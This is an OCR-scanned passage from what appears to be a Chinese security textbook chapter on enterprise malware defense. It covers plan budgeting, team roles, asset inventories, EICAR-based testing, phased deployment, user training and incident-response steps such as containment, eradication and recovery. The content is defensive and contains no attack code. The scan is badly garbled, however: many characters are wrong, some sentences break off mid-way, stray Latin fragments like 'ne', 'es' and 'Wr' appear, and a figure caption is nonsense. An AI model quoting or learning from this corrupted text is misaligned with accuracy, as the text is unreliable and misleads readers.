的 系统 才能 称 得 上 一 个 安全 的 系统 。 


12.4.5 自我 提高 

为 什么 需要 目 我 提高 ? 上 述 内 容 还 不 够 吗 ? 谚语 “ 道 高 一 尺 , 魔 高 一 丈 ” 可 以 形象 地 描 
述 信息 安全 领域 攻防 双方 的 较量 过 程 。 在 攻防 双方 的 相互 促进 过 程 中 ,防范 技术 的 学 习 一 
刻 也 不 能 停止 。 因 此 ,作者 认为 ,对 于 一 个 敬业 的 安全 管理 人 员 来 说 ,需要 在 如 下 两 个 方面 
提高 目 己 .武装 自己 。 

1. 关注 安全 信息 

安全 信息 获取 的 最 佳 途径 莫 过 于 信息 安全 产品 厂商 网 站 .评测 机 构 网 站 安全 技术 论坛 
等 。 因 此 ,建议 用 户 成 为 这 些 地 方 的 常客 。 

详细 的 资料 可 以 参考 本 书 的 附录 ,这 里 有 作者 推荐 的 安全 信息 发 布 渠道 。 

2. 掌握 专业 工具 


微软 公司 的 Sysinternals Suited 工具 套件 是 非常 著名 的 专业 安全 工具 ,里 面 有 近 百 种 
小 工具 。 例 如 ,Autoruns、FileMon Process Monitor 、Rootkit Revealer、TCPView 等 都 是 其 
中 的 典型 代表 。12. 5.4 节 将 介绍 的 额外 的 预防 工具 也 提 到 一 些 诸如 入 侵 检 测 、 蜜 饶 之 类 的 


https: //docs. microsoft. com/en-us/sysinternals/downloads/sysinternals-suite。 
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工具 ,在 特殊 环境 下 ,它们 都 将 成 为 安全 人 员 应 对 新 恶意 代码 的 有 力 工 具 。 
12.5 企业 用 户 防 治 策略 


一 个 好 的 企业 级 恶意 代码 防治 策略 应 包括 以 下 几 个 步骤 。 

(1) 开发 和 实现 一 个 防御 计划 

(2) 使 用 一 个 可 靠 的 恶意 代码 扫描 程序 。 

(3) 加 固 每 个 单独 系统 的 安全 。 

(4) 配置 额外 的 防御 工具 。 

整个 防御 应 当 涵 盖 所 有 受 控 计算 机 和 网 络 中 的 策略 和 规 草 ,包括 终端 用 户 的 培训 、 列 出 
实用 工具 ,建立 对 付 突 发 事件 的 方法 等 。 为 了 更 有 效 地 防范 恶意 代码 ,企业 中 的 每 一 台 计 算 
机 都 要 进行 统一 配置 。 作 为 防御 计划 的 一 部 分 ,选择 一 个 优秀 的 恶意 代码 防范 软件 是 非常 
关键 的 问题 。 最 后 ,在 多 个 工具 的 共同 作用 下 , 即 可 实现 一 个 良好 且 坚 固 的 防治 体系 。 

本 策略 可 以 作为 一 个 大 规模 企业 的 计算 机 安全 防御 体系 的 一 部 分 ,也 可 以 与 企业 已 有 
的 使 用 许可 制度 (Acceptable Use) 和 物理 安全 (Physical Security) 政 策 及 规章 相互 配合 。 


12.5.1 如 何 建立 防御 计划 


建立 恶意 代码 防御 计划 的 步骤 如 下 。 
1. 预算 的 管理 
ne 

企业 在 决定 购买 相关 产品 之 前 需要 仔细 考虑 。 虽 然 成 功 打造 一 个 恶意 代码 防御 计划 令 人 非 
es 对 于 一 个 良好 
的 防御 计划 ,可 从 以 下 几 点 进行 判断 。 

(1) 尽量 减少 费用 。 

(2) 保护 公司 的 可 信人 性 。 

(3) 提高 最 终 用 户 对 计算 机 的 信心 。 

(4) 增加 客户 和 IT 人 员 的 信心 。 

(5) 降低 数据 损失 的 危险 性 。 

(6) 降低 信息 泄露 的 危险 性 。 

2. 精 选 一 个 计划 小 组 

为 了 使 计划 顺利 进行 ,还 需要 一 个 管理 维护 者 的 身份 ,因此 ,要 挑选 实现 防御 计划 所 
需要 的 人 员 ,同时 指定 小 组 的 主要 领导 人 员 。 小 组 成 员 包 括 恶 意 代 码 安 全 顾问 .程序 员 、 
网 络 技 术 专 家 安全 成 员 , 甚 至 包括 终端 用 户 组 中 的 超级 用 户 。 小 组 成 员 的 多 少 依赖 于 
企业 编制 的 大 小 ,但 要 注意 的 是 ,小 组 的 规模 要 尽量 小 ,以 便于 在 一 个 合理 的 时 间 内 进行 
有 效 管 理 。 

3. 组 织 操 作 小 组 

操作 小 组 要 完成 的 工作 : 实现 相关 软 硬 件 机 制 来 防范 恶意 代码 的 解决 方案 ; 负责 方案 
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和 相关 软 人 硬件 机 制 的 更 新 ; 应 急 处 理 等 。 

4. 制定 技术 编目 

在 启动 恶意 代码 防御 计划 前 ,必须 获得 企业 级 的 技术 编目 。 表 12-1 提供 了 一 个 基础 性 
的 技术 编目 列表 示例 。 在 列表 中 ,除了 要 注意 用 户 、PC、 笔 记 本 电脑 .PDA 文件 服 务 器 、 邮 
件 网 关 及 Internet 连接 点 的 数目 之 外 ,还 应 该 记录 操作 系统 的 类 型 .主要 的 软件 类 型 .远程 
位 置 和 广域网 的 连接 平台 。 通 过 以 上 所 有 的 数据 可 以 找到 企业 需要 保护 的 东西 。 最 终 的 解 
决 方案 也 必须 考虑 到 上 面 的 所 有 因素 。 

表 12-1 企业 计算 机 目录 
标示 信息 功能 /操作 系统 


5. 确定 防御 范围 

防御 范围 是 指 被 防御 对 象 的 范围 。 被 防御 用 户 可 能 包括 公司 办 公 室 、 区 域 办 公 室 、 远 程 
用 户 、 笔 记 本 电脑 用 户 、 客 户 机 等 。 计 算 机 平台 可 能 会 涉及 IBM 兼容 机 、Windows NT、 
Windows 3. x.DOS、Macintosh、UNIX、Linux, 文件 服务 颖 ,网 关 、 邮 件 服务 器 、Internet 边 
界 设备 等 。 整 个 计划 可 以 防御 上 所 有 的 计算 机 设备 或 仅 防御 那些 处 于 危险 环境 的 设备 。 不 论 
最 终 防 御 范 围 如 何 ,都 必须 把 "范围 "文字 化 ,记录 在 文档 的 最 主要 部 位 。 

6. 讨论 和 编写 计划 

计划 需要 详细 描述 的 内 容 : 恶意 代码 防范 工具 所 部 署 的 位 置 及 需要 部 署 哪些 工具 , 防 
范 工 具 所 保护 的 资产 ,防范 工具 如 何 部 署 以 及 何 时 、 如何 进 行 升级 工作 ,如 何 定义 一 个 通信 
途径 ,最 终 用户 培 训 以 及 处 理 突 发 事件 的 一 个 快速 反应 小 组 等 细节 问题 。 这 一 部 分 可 以 作 
为 最 终 计 划 的 轮廓 。 在 整个 计划 中 ,需要 详细 说 明 恶 意 代码 防范 工具 的 使 用 和 部 署 ,以 及 对 
每 个 PC 进行 安全 部 署 的 步骤 。 

7. 测试 计划 

在 开始 大 范围 的 部 署 产品 之 前 ,应 该 在 测试 服务 器 和 工作 站 上 进行 试验 。 在 测试 环境 
下 ,如果 测试 成 功 , 就 可 以 开始 小 范围 的 部 署 产 品 。 整 个 部 署 的 过 程 需 要 分 阶段 进行 。 首 先 
在 企业 的 一 个 比较 完整 的 部 门 部 署 , 然 后 逐步 地 在 其 他 区 域 展开 。 采 用 这 种 部 署 策 略 可 以 
逐步 地 检验 并 修正 各 种 工具 。 如 果 不 进 行 测试 ,就 贸然 进行 大 范围 的 产品 部 署 ,可 能 会 出 现 
很 多 问题 并 市 来 很 大 损失 。 有 些 情况 下 ,贸然 部 署 市 来 的 损失 甚至 要 远大 于 没有 任何 防护 
情况 下 恶意 代码 造成 的 损失 。 

8. 实现 计划 

虽然 讨论 和 编写 计划 非常 麻烦 ,但 是 实现 计划 更 加 麻烦 ,不 仅 需 要 投入 大 量 的 资金 、 人 
力 和 时 间 , 而 且 在 实现 计划 时 ,应 当选 择 一 个 合适 的 顺序 ,并 根据 这 个 顺序 采 买 产品 ,逐步 部 
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署 系统 。 一 个 典型 的 顺序 是 ,首先 在 邮件 服务 器 或 文件 服务 器 部 署 恶 意 代 码 防范 工具 ,然后 
在 终端 用 户 的 工作 站 上 进行 防范 工具 的 安装 和 部 署 工 作 。 笔 记 本 电脑 和 远 程 办 公 室 可 以 列 
入 第 二 批 考虑 的 范围 ,并 可 以 从 第 一 批 的 安 婆 部署 中 获得 一 些 经 验 。 表 12-2 所 示 为 一 个 需 
要 维护 的 列表 ,其 中 列 出 了 资产 列表 中 需要 保护 的 条 目 。 经 过 集中 的 整理 ,就 不 会 漏 掉 任何 
计算 机 了 。 


表 12-2 更 改 检查 列表 
标示 信息 所 采取 的 保护 步骤 


9. 提供 质量 保证 测试 

计划 实现 之 后 ,需要 对 工具 和 过 程 进行 一 些 测试 。 首 先 ,检测 各 个 系统 的 恶意 代码 防范 
工具 是 否 正 在 工作 。 常 采用 的 方法 是 问 一 个 被 保护 的 系统 发 送 一 个 恶意 代码 测试 文件 ,或 
者 是 其 他 类 型 的 测试 ,不 要 使 用 那些 一 旦 失控 就 会 造成 大 范围 破坏 的 东西 去 测试 。 许 多 公 
司 都 使 用 EICAR 测试 文件 。 然 后 ,对 软件 机 制 和 恶意 代码 数据 库 的 更 新 问题 进行 测试 。 
最 后 ,在 整个 企业 范围 进行 弱点 测试 ,从 而 确认 防御 部 分 是 否 能 够 保护 它们 所 要 保护 的 所 有 
Wr 

10. 保护 新 加 入 的 资产 

制定 一 些 策略 来 保护 新 加 入 的 计算 机 。 部 署 小 组 经 常 有 能 力 来 保护 那些 在 原始 计划 下 
定义 的 所 有 资产 ,但 是 一 个 月 后 总 是 忘 了 对 新 的 计算 机 进行 修改 。 对 新 加 入 的 计算 机 应 该 
进行 全 面 检测 ,从 而 保证 整个 企业 网 络 是 安全 的 。 

11. 对 快速 反应 小 组 的 测试 

恶意 代码 发 作 时 ,通常 会 用 到 快速 反应 小 组 。 通 过 一 个 预先 伪装 的 发 作 来 检测 快速 反 

应 小 组 ， 这 给 了 所 有 人 一 个 机 会 来 练习 他 们 的 任务 ,检测 通信 系统 ,并 解决 所 有 问题 。 测 试 
演习 中 发 现 的 小 问题 如 果 没 有 得 到 解决 ,往往 就 会 长 期 存在 。 根 据 是 否定 期 复查 的 情况 ,用 
户 应 该 在 每 年 中 每 隔 一 段 时 间或 操作 改变 后 ,测试 一 下 有 关 小 组 

12. 更 新 和 复查 的 预定 过 程 

没有 什么 安全 计划 是 稳定 的 。 软 硬件 和 操作 系统 都 是 在 改变 的 。 用 户 行 为 和 新 技术 都 
会 使 新 的 危险 出 现在 企业 环境 里 。 企 业 的 计划 应 该 被 视 为 是 一 个 “时 刻 更 新 的 文档 ”, 应 该 
预先 定义 定期 复查 的 过 程 ,并且 对 它 的 成 效 性 进行 评估 。 当 新 的 危险 出 现 或 当 计划 开始 变 


@@ EICAR( 反 病毒 测试 文件 ,www. eicar. org) 能 够 对 反 病 毒 软件 进行 有 限 测 试 ,来 确认 反 病 毒 软件 是 否 正在 运行 。 
这 个 文件 的 大 小 不 超过 68 字 节 , 绝 大 多 数 反 病毒 软件 供应 商都 认可 这 个 文件 的 有 效 性 。 许 多 组 织 每 天 把 EICAR 文件 
发 给 被 反 病 毒 软 件 保护 的 服务 器 和 网 关 来 验证 操作 是 否 正常 。 如 果 发 送 了 测试 文件 以 后 ,没有 得 到 报告 信息 ,管理 员 就 
知道 特定 的 服务 器 或 设备 没有 得 到 保护 。 
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得 落后 时 ,及 时 复查 就 应 该 开始 了 。 
12.5.2 执行 计划 

到 目前 为 止 , 小 组 已 经 组 建 , 相 关 的 环境 也 收集 好 了 ,该 是 制订 计划 的 时 候 了 。 恶 意 代 
码 防 御 计 划 应 该 者 括 所 有 恶意 代码 进入 企业 的 途径 。 绝 大 多 数 不 怀 好 意 的 程序 初次 进入 系 
统 部 是 通过 电子 邮件 系统 的 。 可 是 ,次 通病 毒 、. 蠕 虫 和 木马 也 可 以 通过 磁盘 文件 .Internet 
下 载 .即时 消息 客户 端 软件 进入 到 系统 。 很 久 以 前 ,扫描 插入 的 磁盘 及 禁止 软盘 启动 就 可 以 
达到 封锁 恶意 代码 入 口 的 功能 。 但 今天 ,用 户 需 要 考虑 磁盘 (CU 盘 、 移 动 便 盘 ) Internet、 邮 


件 . 笔 记 本 电脑 .PDA、 和 远程 用 户 , 以 及 其 他 允许 数据 或 代码 进入 保护 区 的 所 有 因素 ,如 
图 12-4 所 示 。 


FTP 共享 用 户 
多 电导- 来 自 MMC 的 病毒 
二 mr 了 记性 -站 g 二- 


12-4 潜在 的 恶意 代码 进入 点 


很 多 企业 外 部 计算 机 和 网 络 通常 和 企业 内 部 受 保护 的 资源 是 相互 连接 的 。 如 果 考 虑 到 
其 他 企业 公司 的 计算 机 相互 感染 的 问题 ,平等 的 解决 方案 就 是 他 们 也 采用 相同 的 尺度 来 降 
低 感染 区 域 的 可 能 性 。 厂 商 . 第 三 方 . 与 外 部 计算 机 或 网 络 有 连接 的 商业 伙伴 都 需要 遵循 一 
个 最 低 标准 的 规定 ,并 签署 一 个 文件 以 证 明 他 们 理解 了 有 关 的 规定 。 有 时 ,公司 防御 计划 中 
的 做 法 和 采用 的 工具 可 以 被 外 界 的 计算 机 和 网 络 所 参考 ,或 者 作为 对 已 使 用 的 反 恶 意 代码 
软件 进行 升级 的 范例 。 

1. 计划 核心 

以 下 提 到 的 3 个 目标 就 是 整个 防御 计划 的 基石 。 

(1) 使 用 值得 信赖 的 反 恶 意 代 码 扫描 引擎 。 

(2) 调整 PC 环境 以 阻止 恶意 代码 的 传播 。 

(3) 使 用 其 他 的 工具 来 提供 一 个 多 层 的 防御 。 

使 用 一 个 可 靠 、 最 新 的 恶意 代码 扫描 引擎 是 整个 计划 的 基石 。 恶 意 代码 扫描 引擎 在 通 
过 检测 和 清除 恶意 代码 来 实现 保护 计算 机 方面 是 很 成 功 的 ,每 一 个 公司 都 应 该 使 用 它 。 可 
是 ,今天 纯粹 依赖 于 恶意 代码 扫描 引擎 则 是 一 个 错误 。 历 史 一 次 次 地 证 明 ,扫描 引擎 无 法 也 
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永远 无 法 阻止 所 有 的 恶意 代码 入 侵 。 用 户 必 须 假定 恶意 代码 可 以 通过 其 恶意 代码 防御 系 
统 , 并 采取 措施 来 降低 它 的 传染 性 。 如 果 做 得 正确 ,在 那些 得 到 保护 的 PC 上 ,恶意 代码 就 
不 会 改作 。 最 后 ,应 该 考虑 其 他 的 防御 和 检测 工具 来 保护 用 户 的 环境 ,并 迅速 跟踪 相关 的 
漏洞 。 

2. 软件 部 署 

计划 中 应 该 详细 地 列 出 实现 政策 和 过 程 所 需 的 人 力 资源 。 通 常 来 说 ,在 部 署 所 有 的 工 
具 时 ,需要 通过 多 种 技巧 才能 够 取得 同等 的 效果 。 网 络 管理 员 需 要 在 文件 和 邮件 服务 器 上 
测试 和 安装 软件 。 调 整 本 地 工作 站 需要 烦琐 的 技术 工作 (除非 对 部 属 工具 非常 精通 )。 需 要 
估计 出 每 个 人 花费 在 测试 和 安装 软件 上 的 时 间 ,并 建立 一 个 部 署 进度 表 。 

3. 分 布 式 更 新 

一 旦 恶意 代码 防御 工具 配置 完毕 ,如 何 保证 它们 的 更 新 呢 ? 许多 反 恶 意 代 码 工 具 人 允许 
通过 中 央 服 务 器 来 下 载 更 新 包 , 并 将 更 新 包 发 往 当 地 的 工作 站 。 工 作 站 的 调整 必须 一 次 次 
地 手动 配置 ,或 者 使 用 中 央 登 录 脚 本 .脚本 语言 、 批 处 理 文件 .微软 SMS 来 完成 。 尽 管 这 些 
方式 有 助 于 对 分 布 工具 进行 自动 升级 ,但 还 需要 对 大 的 更 新 进行 手工 测试 。 拥 有 多 种 台式 
机 和 大 型 局 域 网 的 大 型 组 织 可 以 采用 多 种 升级 方式 ,其 中 包括 上 月 动 分 布 工具 .CD-ROM、 磁 
盘 、 映 射 驱动 顺和 FTP 等 ,也 可 以 使 用 适合 于 自己 计算 机 环境 的 工具 。 同 样 ,对 于 那些 具有 
支配 地 位 的 人 们 (包括 雇员 和 最 终 用 户 ) ,也 需要 对 更 新 负 有 责任 。 但 是 ,总 是 有 一 些小 组 负 
责 人 或 部 门 经 常 忘记 更 新 。 

4. 沟通 方式 

防御 计划 的 核心 就 是 通信 。 当 恶意 代码 发 作 时 ,最 终 用 户 和 自动 报警 系统 会 提醒 防御 
小 组 的 成 员 。 小 组 成 员 需 要 相互 联系 从 而 召集 队伍 。 小 组 领导 者 需要 提醒 管理 者 。 小 组 中 
的 某 些 人 被 指定 负责 企业 和 防 恶 意 代码 厂商 进行 联系 工作 。 事 先 需 要 定义 一 个 指挥 系统 ， 
从 而 保证 把 最 新 的 状态 从 小 组 发 往 每 一 个 独立 的 最 终 用 户 。 

在 一 个 典型 的 计划 中 ,应 明确 地 制定 任务 和 责任 ,并 建立 一 个 反馈 机 制 ,每 一 个 应 付 突 
发 危机 事件 的 小 组 成 员 ( 快 速 反应 小 组 ) 都 会 分 别 负 责 与 特定 的 部 门 或 分 区 领导 之 间 的 联系 
工作 ,使 得 最 终 用 户 和 部 门 可 以 和 小 组 取得 联系 。 被 联系 的 部 门 领 导 对 他 管理 下 的 雇员 负 
有 责任 。 

5. 最 终 用 户 的 培训 


虽然 编写 了 计划 ,但 是 那些 最 终 用 户 有 可 能 忽略 这 些 预 先 提出 的 建议 。 最 好 对 最 终 用 
户 做 一 个 集体 通知 和 培训 。 培 训 应 该 包括 对 恶意 代码 领域 的 简要 概括 ,并 讨论 普通 病毒 、 里 
虫 、 木 马 、 恶意 邮件 和 不 怀 好 意 的 Internet 代码 。 用 户 应 该 意识 到 ,从 Internet 下 载 软件 、 安 
装 好 看 的 屏 医 保护 和 运行 好 笑 的 执行 文件 都 是 很 危险 的 事情 。 培 训 材 料 应 该 谈 到 相关 的 危 
险 ,以 及 公司 为 了 降低 这 些 危 险 所 做 的 努力 ,包括 每 一 个 员工 为 了 降低 恶意 代码 传播 的 可 能 
性 而 做 出 的 努力 。 

需要 让 最 终 用 户 了 解 , 只 有 通过 认证 的 软件 才 可 以 安装 到 公司 的 计算 机 上 。 软 件 不 能 
从 网 上 下 载 ,不 可 以 从 家 里 带 来 ,也 不 能 根据 以 前 没有 认证 但 是 安装 成 功 的 例子 而 进行 。 用 
户 需 要 被 告知 ,一旦 恶意 代码 发 作 就 需要 回合 适 的 负责 人 或 部 门 报告 ,并 被 告知 破坏 纪律 会 
带 来 惩罚 性 的 处 理 。 用 户 需 要 签署 一 个 表格 以 证 明 他 们 对 规定 的 理解 。 该 表格 将 被 收入 雇 
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员 个 人 记录 中 。 

6. 应 急 响 应 

每 个 计划 都 需要 制定 小 组 成 员 面 对 恶 意 代 码 发 作 时 应 采取 的 措施 。 通 常 来 说 ,配置 好 
的 防御 工具 会 保护 用 户 的 环境 ,但 是 偶尔 有 新 的 恶意 代码 会 绕 过 防御 设施 或 一 个 未 受 保护 
的 计算 机 ,并 将 一 个 已 知 的 威胁 到 处 传播 。 另 外 ,还 有 一 个 普遍 的 问题 : 计划 需要 说 明 如 何 
处 理 多 个 恶意 代码 感染 同时 发 作 的 问题 ,并 且 同 时 报告 快速 反应 小 组 。 以 下 就 是 面 对 一 次 
恶意 代码 事故 需要 考虑 的 步骤 。 

1) 向 负责 人 报告 事故 

不 管 问题 的 发 作 是 如 何 被 人 第 一 次 发 现 的 ,第 一 个 知道 问题 的 小 组 成 员 都 应 该 向 小 组 
负责 人 报警 ,并 且 向 其 他 小 组 成 员 通 报 。 通 信和 工具 必须 是 快速 的 可靠 的 ,并 且 不 受 恶 意 代 
码 的 干扰 。 例 如 ,小 组 成 员 按照 常规 采用 了 通过 Internet 邮件 向 其 他 小 组 成 员 发 送 紧 急 记 
录 , 而 邮件 网 关 可 能 已 经 被 恶意 代码 破坏 了 。 小 组 人 员 在 发 现 邮件 威胁 已 经 出 现时 ,会 通过 
电话 .手机 等 人 工 通 知 或 者 通过 基于 HTML 的 邮件 来 通知 相关 成 员 。 

2) 收集 原始 资料 

赶 到 的 小 组 成 员 应 注意 收集 资料 ,并 相互 共享 所 知道 的 恶意 代码 的 相关 信息 ,以 得 
到 对 恶意 代码 的 概要 性 了 解 。 例 如 : 它 是 通过 邮件 传播 的 吗 ? 哪儿 最 先 出 现 问 题 ? 已 经 
开始 传播 了 多 久 ? 它 会 修改 本 地 文件 系统 吗 ? 它 属 于 哪 一 种 恶意 代码 ? 它 是 用 什么 语 
言 编写 的 ? 

3) 最 小 化 传播 

完成 了 最 初 的 资料 收集 以 后 ,小 组 人 员 应 该 很 快 采 取 步 骤 以 使 恶意 代码 的 传播 速度 最 
小 化 。 如 果 是 邮件 蠕虫 ,可 以 关闭 邮件 服务 器 或 阻止 来 自 Internet 的 访问 。 如 果 恶 意 代码 
已 经 修改 或 破坏 了 文件 服务 器 上 的 文件 , 则 应 断 开 用 户 的 连接 并 关闭 登录 。 如 果 攻 击 很 严 
重 , 可 以 考虑 关闭 相关 的 服务 器 和 工作 站 ,也 可 以 不 关闭 服务 器 而 进行 恶意 代码 清除 工作 ， 
但 是 会 花费 更 多 的 时 间 。 如 果 面 对 一 个 相似 的 环境 ,用 户 应 该 让 高 级 管理 人 员 来 确定 是 不 
是 需要 最 小 化 关机 时 间或 最 小 化 服务 中 断 时 间 。 此 外 ,确认 用 户 拥 有 服务 器 和 服务 关闭 的 
有 关 记 录 , 从 而 可 以 很 快 地 恢复 服务 。 

4) 让 最 终 用 户 了 解 最 新 的 危险 

在 入 口 处 和 公共 场合 张贴 关于 问题 和 用 户 应 该 做 些 什么 的 署名 告示 ,将 是 一 个 通知 用 
户 的 比较 好 的 途径 。 如 果 恶 意 代 码 已 经 从 用 户 的 公司 传播 到 其 他 公司 了 ,注意 尽量 与 他 们 
进行 沟通 。 例 如 ,感染 邮件 蠕虫 ,虽然 用 户 可 以 通过 邮件 发 送 一 个 报警 通知 ,但 是 通常 来 不 
及 阻止 它们 。 

发 现 问题 时 ,不 应 该 只 通知 那些 受到 感染 的 部 门 ,还 要 通知 那些 没有 被 感染 的 部 门 。 没 
有 感染 的 部 门 可 以 监测 传播 的 先兆 ,并 且 警 告 他 们 的 用 户 不 要 打开 特定 的 邮件 等 。 

让 最 终 用 户 了 解 此 时 正在 处 理 问题 , 当 可 以 安全 地 使 用 特定 的 服务 和 服务 器 时 ,会 和 他 
们 联系 。 同 样 也 要 通知 管理 层 , 让 他 们 知道 事态 的 进展 情况 。 

5) 收集 更 多 的 事实 

到 目前 为 止 , 小 组 成 员 在 一 定 意义 上 控制 了 恶意 代码 的 传播 和 破坏 ,并 采取 了 步骤 阻止 
更 大 的 和 危害。 快速 反应 小 组 应 该 收集 信息 并 讨论 问题 ,并 把 新 的 恶意 代码 交 到 反 恶 意 代码 
软件 公司 进行 分 析 。 
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查 清 楚 谁 没有 感染 和 谁 被 感染 是 一 样 重要 的 。 如 果 一 个 部 门 除了 一 台 计 算 机 外 都 被 感 
染 了 , 则 可 以 找 出 使 用 这 台 计 算 机 的 人 到 底 做 过 什么 (如 打开 感染 了 的 邮件 )。 也 许 就 是 特 
定 的 工作 站 上 面 的 一 个 组 件 阻止 了 恶意 代码 的 传播 。 如 果 防 御 工 具 本 来 可 以 挡住 恶意 代 
码 , 就 需要 搞 清 楚 为 什么 它 可 以 通过 防御 。 

确认 具体 的 损失 。 它 到 底 传播 了 多 远 ? 多少 台 PC 受到 感染 ? 多 少 部 门 受到 影响 ? 亚 
意 代 码 对 计算 机 做 了 些 什 么 ? 它 到 底 有 没有 删除 其 他 文件 ,重新 命名 文件 ? 履 盖 文件 ? 修 
改 注册 表 ? 或 者 在 启动 文件 中 加 入 了 别 的 东西 ? 可 以 通过 PC 的 Find-~>Files or Folders 来 
查找 最 近 有 哪些 文件 发 生 了 改动 。 如 果 受 到 恶意 代码 或 蠕虫 攻击 ,一般 会 立刻 发 现 有 可 疑 
的 文件 出 现 。 通 常会 在 多 个 启动 区 域 检查 是 否 有 可 疑 的 变化 。 然 后 用 NETSTAT -A 来 检 
查 可 疑 的 Internet 连接 。 一 旦 发 现 了 可 疑 文 件 ,可 以 和 小 组 其 他 成 员 在 其 他 计算 机 上 发 现 
的 东西 进行 比较 : 程序 是 不 是 一 直 在 做 同样 的 事情 ? 每 次 修改 的 文件 是 不 是 有 着 同样 的 名 
称 ? 被 感染 的 邮件 是 不 是 有 着 同样 的 主题 ?计算 机 之 间 的 系统 的 修改 是 不 是 一 样 的 ? 收集 
这 些 证 据 的 所 有 记录 。 如 果 可 能 ,可 以 让 小 组 中 的 相关 人 员 对 恶意 代码 进行 进一步 的 分 
析 。 任 何 一 个 程序 员 都 可 以 读 懂 并 至 少 在 一 定 程 度 上 理解 当前 很 多 的 基于 VBScript 的 
蠕虫 源 代 码 。 但 是 没有 来 自 反 恶意 代码 软件 商 的 帮助 ,一 般 无 法 100% 理 解 恶 意 代码 的 
所 作 所 为 。 

6) 制定 并 实现 一 个 最 初 的 根除 计划 

用 所 学 的 东西 实现 一 个 有 秩序 的 根除 计划 。 例 如 ,对 于 绝 大 多 数 邮件 蠕虫 ,首先 删除 所 
有 的 受 感 染 的 邮件 (Microsoft Exchange 服务 需 上 的 EXMERGE 就 是 一 个 较 好 的 工具 )。 
最 好 删除 或 替换 那些 被 损坏 或 感染 了 的 文件 。 可 疑 的 文件 应 该 移动 到 一 个 隔离 区 域 中 ,以 
方便 随后 的 分 析 。 通 过 使 用 中 央 登 录 脚 本 ,可 以 启用 批 处 理 文件 来 查找 恶意 代码 ,并 从 PC 
上 删除 它们 及 修复 毁坏 的 文件 。 

可 以 考虑 在 清除 以 前 做 一 个 受害 系统 的 完全 备份 ,从 而 为 以 后 的 分 析 做 好 准备 。 确 保 
那些 好 心 的 技术 人 员 不 会 删除 那些 恶意 代码 的 所 有 备份 , 若 没 有 留 下 任何 东西 就 无 法 分 析 
恶意 代码 的 所 作 所 为 。 删 除 所 有 恶意 代码 的 备份 只 会 使 清除 工作 更 加 复杂 。 

首先 ,始终 在 一 套 测试 用 的 计算 机 上 和 运行 清除 程序 ,以 保证 清除 程序 不 会 造成 更 多 的 损 
失 。 其 次 ,在 少数 不 同 区 域 中 的 普通 计算 机 上 运行 清除 程序 。 然 后 ,验证 恶意 代码 程序 已 经 
被 彻底 清除 ,再 也 没有 新 的 损失 了 。 只 有 这 个 时 候 , 才 可 以 把 该 清除 程序 公 诸 于 众 。 通 过 预 
先 设 定 的 通信 机 制 来 警告 最 终 用 户 并 额外 提供 有 用 的 建议 。 

7) 验证 根除 工作 正在 进行 

派出 操作 小 组 中 的 成 员 来 验证 最 终 用 户 的 计算 机 已 经 彻底 地 得 到 清理 ,并 监视 通信 通 
道 来 查找 问题 。 有 时 在 这 个 时 候 会 发 现 当 初 在 早期 分 析 时 小 组 没有 注意 到 的 东西 。 如 果 有 
这 样 的 问题 存在 ,清除 程序 应 该 进行 合适 的 调整 ,并 再 次 发 放 给 所 有 的 受 感染 的 用 户 。 将 清 
除 工作 的 情况 向 操作 人 员 和 最 终 用 户 进行 通报 。 

8) 恢复 关闭 的 系统 

在 系统 清除 完毕 后 ,就 可 以 把 关闭 的 系统 再 次 启动 了 。 系 统一 旦 启动, 用 户 就 会 很 快 开 
始 登 录 系 统 。 根 据 当 初 记 录 的 禁止 系统 名 单 , 就 可 以 知道 需要 局 动 哪些 东西 。 去 掉 那 个 关 
于 警告 用 户 有 关 事 项 的 通告 ,并 且 通 知 用 户 可 以 按照 正常 的 程序 登录 了 ,并 告知 是 否 还 有 其 
他 没有 启动 的 系统 。 
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9) 为 恶意 程序 的 再 次 发 作 做 好 准备 

为 恶意 代码 的 再 次 发 作 做 好 准备 ,并 把 此 事 告知 最 终 用 户 。 通 常情 况 下 ,发现 最 初 攻击 
问题 所 花 的 时 间 越 长 ,问题 就 越 容 易 再 次 发 生 。 在 早期 DOS 引导 恶意 代码 的 时 代 , 公 司 发 
现 计算 机 被 感染 时 通常 已 经 是 几 个 月 到 一 年 以 后 。 而 到 那个 时 候 , 感 染 的 磁盘 已 经 在 公司 
广泛 流传 ,直至 再 次 发 作 。 邮 件 蠕虫 也 是 一 样 的 道理 ,发 现 得 越 早 ,它们 就 越 不 易 传 播 得 
更 远 。 

10) 确认 公众 关系 的 影响 

这 里 必须 考虑 恶意 代码 发 作 融 给 最 终 用 户 、 公 司 、 操 作 员 、 外 界 消 费 者 和 商务 伙伴 的 影 
啊 。 如 果 恶 意 代码 从 用 户 的 公司 传播 到 其 他 公司 ,该 是 写 道 痰 信 的 时 候 了 。 要 确认 问题 是 
否 已 经 解决 ,并 阻止 问题 的 再 次 发 生 。 提 醒 那 些 需 要 提醒 的 代理 商 ,并 且 决 定 是 否 需 要 采取 
法 律 措 施 。 如 果 有 新 闻 媒 体 来 采访 ,也 需要 考虑 一 下 公众 关系 的 反应 ,计划 中 应 该 准备 相关 
的 说 明 。 

11) 做 一 次 更 加 深入 的 分 析 

危机 解决 后 ,可 以 做 一 次 更 加 深入 的 分 析 。 在 这 个 时 候 , 应 该 对 恶意 代码 程序 的 所 作 所 
为 有 了 一 个 全 面 的 了 解 。 不 管 是 应 急 小 组 分 析 程 序 还 是 反 恶 意 代 码 软 件 公司 做 出 的 结论 ， 
都 应 该 进行 深入 的 分 析 来 解决 企业 的 损失 。 防 御 计 划 或 工具 是 不 是 存在 恶意 代码 传播 的 漏 
洞 ,是 不 是 已 经 得 到 了 解决 ? 把 相关 的 问题 做 成 文档 也 是 有 帮助 的 ,诸如 为 什么 这 种 恶意 代 
码 会 比 其 他 的 恶意 代码 传播 得 更 加 广泛 等 。 这 些 问题 有 助 于 把 计划 修改 得 更 加 完善 。 在 将 
来 的 预算 中 ,可 以 使 用 收集 的 统计 资料 作为 尺度 对 安全 计划 的 花费 和 影响 进行 调整 。 


12.5.3 有 恶意 代码 扫描 引擎 相关 问题 


恶意 代码 扫描 引擎 的 基本 功能 就 是 详细 地 检查 目标 文件 ,并 且 和 已 知 的 恶意 代码 数据 
库 进 行 比较 。 和 良好 的 恶意 代码 扫描 引擎 的 特征 包括 速度 .准确 性 、 稳 定性 、 透 明度. 运行 平 
人 台 、 用 户 可 定制 性 、 自 我 保护 ,扫描 率 、 磁 盘 急 救 、 自 动 更 新 ,技术 文 持 日 志 、 通 知 、 处 理 邮件 
的 能 力 .前 脆性 研究 和 企业 性 能 。 决 定 是 否 运 行 恶 意 代码 扫描 引擎 不 是 一 件 费 脑筋 的 事情 ， 
